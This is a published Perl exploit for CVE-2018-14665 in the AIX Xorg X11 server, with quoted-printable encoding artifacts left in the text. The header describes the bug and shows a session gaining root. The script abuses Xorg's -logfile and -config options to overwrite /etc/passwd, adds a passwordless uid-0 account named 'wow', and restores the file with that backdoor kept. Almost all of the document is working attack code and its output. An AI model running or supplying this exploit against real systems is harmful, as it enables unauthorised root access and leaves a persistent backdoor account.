Xorg X11 Server (AIX) Local Privilege Escalation

`# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation  
# Date: 29/11/2018  
# Exploit Author: @0xdono  
# Original Discovery and Exploit: Narendra Shinde  
# Vendor Homepage: https://www.x.org/  
# Platform: AIX  
# Version: X Window System Version 7.1.1  
# Fileset: X11.base.rte < 7.1.5.32  
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)  
# CVE: CVE-2018-14665  
#  
# Explanation:  
# Incorrect command-line parameter validation in the Xorg X server can  
# lead to privilege elevation and/or arbitrary files overwrite, when the  
# X server is running with elevated privileges.  
# The -logfile argument can be used to overwrite arbitrary files in the  
# file system, due to incorrect checks in the parsing of the option.  
#  
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.  
# It overwrites /etc/passwd in order to create a new user with root privile=  
ges.=20  
# All currently logged in users need to be included when /etc/passwd is ove=  
rwritten,  
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch=  
ange user.  
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=  
,  
# and is replaced by '-config'.  
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.  
#  
# IBM has not yet released a patch as of 29/11/2018.  
#  
# See also:  
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html  
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html  
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl  
#  
# Usage:  
# $ oslevel -s  
# 7100-04-00-0000  
# $ Xorg -version  
# =20  
# X Window System Version 7.1.1  
# Release Date: 12 May 2006  
# X Protocol Version 11, Revision 0, Release 7.1.1  
# Build Operating System: AIX IBM  
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00  
# Build Date: 07 July 2006  
# Before reporting problems, check http://wiki.x.org  
# to make sure that you have the latest version.  
# Module Loader present  
# $ id  
# uid=3D16500(nmyo) gid=3D1(staff)  
# $ perl aixxorg.pl  
# [+] AIX X11 server local root exploit  
# [-] Checking for Xorg and ksh93=20  
# [-] Opening /etc/passwd=20  
# [-] Retrieving currently logged in users=20  
# [-] Generating Xorg command=20  
# [-] Opening /tmp/wow.ksh=20  
# [-] Writing Xorg command to /tmp/wow.ksh=20  
# [-] Backing up /etc/passwd to /tmp/passwd.backup=20  
# [-] Making /tmp/wow.ksh executable=20  
# [-] Executing /tmp/wow.ksh=20  
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20  
# [-] Done=20  
# [+] 'su wow' for root shell=20  
# $ su wow  
# # id  
# uid=3D0(root) gid=3D0(system)  
# # whoami  
# root  
  
#!/usr/bin/perl  
print "[+] AIX X11 server local root exploit\n";  
  
# Check Xorg is in path  
print "[-] Checking for Xorg and ksh93 \n";  
chomp($xorg =3D `command -v Xorg`);  
if ($xorg eq ""){=20  
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";  
exit;  
}  
  
# Check ksh93 is in path  
chomp($ksh =3D `command -v ksh93`);  
if ($ksh eq ""){  
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";  
exit;  
}  
  
# Read in /etc/passwd  
print "[-] Opening /etc/passwd \n";  
open($passwd_fh, '<', "/etc/passwd");  
chomp(@passwd_array =3D <$passwd_fh>);  
close($passwd_fh);  
  
# Retrieve currently logged in users  
print "[-] Retrieving currently logged in users \n";  
@users =3D `who | cut -d' ' -f1 | sort | uniq`;  
chomp(@users);  
  
# For all logged in users, add their current passwd entry to string  
# that will be used to overwrite passwd  
$users_logged_in_passwd =3D '';  
foreach my $user (@users)  
{  
$user .=3D ":";  
foreach my $line (@passwd_array)  
{  
if (index($line, $user) =3D=3D 0) {  
$users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=  
ine;  
}  
}  
}  
  
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=  
written to log  
print "[-] Generating Xorg command \n";  
$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=  
r/bin/ksh\n#' . '\'';  
  
print "[-] Opening /tmp/wow.ksh \n";=09=09  
open($fr, '>', "/tmp/wow.ksh");  
  
# Use ksh93 for ANSI-C quoting  
print "[-] Writing Xorg command to /tmp/wow.ksh \n";  
print $fr '#!' . "$ksh\n";  
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";  
close $fr;  
  
# Backup passwd=20  
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";  
system("cp /etc/passwd /tmp/passwd.backup");  
  
# Make script executable and run it  
print "[-] Making /tmp/wow.ksh executable \n";  
system("chmod +x /tmp/wow.ksh");  
print "[-] Executing /tmp/wow.ksh \n";  
system("/tmp/wow.ksh");  
  
# Replace overwritten passwd with: original passwd + wow user  
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";  
$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=  
::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;  
  
print "[-] Done \n";  
print "[+] 'su wow' for root shell \n";  
  
  
`